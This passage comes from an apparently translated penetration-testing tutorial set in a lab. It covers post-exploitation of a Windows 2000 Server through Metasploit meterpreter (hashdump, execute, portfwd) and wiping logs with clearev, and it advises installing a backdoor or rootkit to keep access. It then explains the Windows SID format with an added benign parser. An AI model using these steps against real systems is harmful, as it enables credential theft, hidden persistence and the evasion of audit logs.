In this part of the guide, cutynhangheo uses a vulnerability in Windows 2000 Server: the RPC DCOM port vulnerability, which allows remote code execution by overflowing a buffer on the system. In the Metasploit part of the guide we learned how to exploit vulnerabilities on a target. This opens a meterpreter shell on the Windows 2000 Server system with IP 192.168.13.129, as shown in Figure 27 below. BackTrack 5 also provides tools such as SET that can be used to compromise a system.

Figure 27: Inside the Windows 2000 Server system.

Once we are inside the system, we can gather detailed information about it. Here are some important commands for doing so:

3.1. Hashdump: This command dumps the password hashes (NT/LM) of the target system; this information is used to crack passwords and then escalate privileges on the target system.
3.2. Sysinfo: This command gathers detailed information about the target system, such as the operating system, vendor, admin name and much more.

3.3. Execute: This is an extremely powerful command, used to execute a program or file on the target system.
3.4. Portfwd: This is a very powerful command, used to run a service on a specified port on the target system. It can be used to create a backdoor for future use.

4. Covering tracks:
This section summarizes removing the traces of the attack from the target system. Simply put, the clearev command clears the event logs on the system, leaving no trace of the unauthorized access.

Figure 28: Clearev.

Log management on the target system.

Figure 29: Event logs in Windows 2000 Server.

The clearev command wipes the logs and leaves no trace of the unauthorized intrusion on the system. However, a sharp and experienced admin will immediately suspect something is wrong when all the logs have been wiped clean. For that reason, we should install a backdoor or rootkit so we can return to the victim at any time.

5. Overview of the Windows security model:
The Windows security model is fairly simple. Every user has a unique SID. A SID has the following form:




S-1-5-21-9867453210-2389765341-23768956-1023

Red (1): Revision level
Green (5): Identifier Authority value
Orange (21-9867453210-2389765341-23768956): Domain or local ID
Peach (1023): Relative ID
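A parser for the SID layout shown in the legend, added here as an example that is not part of the original guide: it splits a SID string into revision, identifier authority, domain/local identifier and relative ID, and classifies the RID. One caveat a reader should know: the sub-authority 9867453210 in the sample SID above does not fit in the 32 bits a sub-authority has, so a strict parser rejects that string; the SID values in the code are constructed and well-formed.

```python
"""Added example, not from the original guide: parse and validate a
Windows SID string into the fields named in the legend above."""
import re
from typing import List, NamedTuple

# Real well-known RIDs; every other RID below 1000 is also reserved.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest",
                   512: "Domain Admins", 513: "Domain Users"}

class SID(NamedTuple):
    revision: int
    identifier_authority: int
    sub_authorities: List[int]  # domain or local machine identifier
    rid: int                    # relative ID, the last sub-authority

_SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")

def parse_sid(text):
    """Parse 'S-R-IA-SA1-...-RID'; raise ValueError on malformed input."""
    m = _SID_RE.match(text)
    if not m:
        raise ValueError(f"not a SID string: {text!r}")
    revision, authority = int(m.group(1)), int(m.group(2))
    parts = [int(p) for p in m.group(3).split("-")[1:]]
    if revision != 1:
        raise ValueError("only SID revision 1 exists")
    if authority >= 2 ** 48:  # identifier authority is a 48-bit value
        raise ValueError("identifier authority out of range")
    if any(p >= 2 ** 32 for p in parts):  # each sub-authority is 32 bits
        raise ValueError("sub-authority does not fit in 32 bits")
    return SID(revision, authority, parts[:-1], parts[-1])

def is_valid_sid(text):
    try:
        parse_sid(text)
        return True
    except ValueError:
        return False

def describe_rid(sid):
    """RIDs below 1000 are reserved for built-in principals; accounts
    created on the machine or domain are numbered from 1000 upward."""
    if sid.rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[sid.rid]
    return "built-in/reserved" if sid.rid < 1000 else "user-created"

# Constructed, well-formed sample SID (not a real account)
SAMPLE_SID = "S-1-5-21-1004336348-1177238915-682003330-1023"
```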